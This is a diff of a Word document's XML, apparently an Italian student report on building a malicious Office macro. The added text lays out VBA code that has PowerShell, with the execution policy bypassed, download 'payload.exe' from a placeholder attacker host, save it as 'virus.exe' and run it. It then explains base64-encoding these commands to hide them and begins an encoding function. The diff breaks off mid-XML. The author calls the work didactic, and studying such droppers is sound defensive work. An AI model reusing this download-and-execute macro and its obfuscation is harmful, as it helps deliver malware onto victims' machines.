--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -83,7 +83,7 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">                   Email</w:t>
+        <w:t xml:space="preserve">              Email</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -195,7 +195,1439 @@
         <w:t xml:space="preserve"> in base 64.</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>COMANDI POWERSHELL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">"(New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DownloadFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('" &amp; "http://</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ipattaccante</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t>porta</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>percorso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dove</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>voglio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>salva</w:t>
+      </w:r>
+      <w:r>
+        <w:t>re</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>virus.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>" &amp; "')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>" &amp; '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>percorso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dove</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>è\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>salvato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>virus.exe'"</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>' Eseg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>ui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>TECNICHE DI CODIFICA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">er la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in VBA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>che</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringh</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> date in input, in un contest </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reale</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sarebbero</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> state date </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>direttamente</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> come input del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decodificatore</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> di VBA, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tuttavia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fini</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>didattici</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inserito</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>all’interno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> del file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mostrarne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>funzionamento</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>programma</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>infatti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>esegue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seguenti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passaggi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Inizializza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>coi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Decodifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Esegue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decodificati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>METODI USATI PER CODIFICARE I COMANDI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in input in base 64 e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>restituisce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Function EncodeBase64(str As String) As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Crea</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"MSXML2.DOMDocument")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML.createElement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("b64")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Imposta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il testo del </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>nodo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.dataType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>bin.base</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>64"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.nodeTypedValue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(str)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Restituisci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>risultato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codifica</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
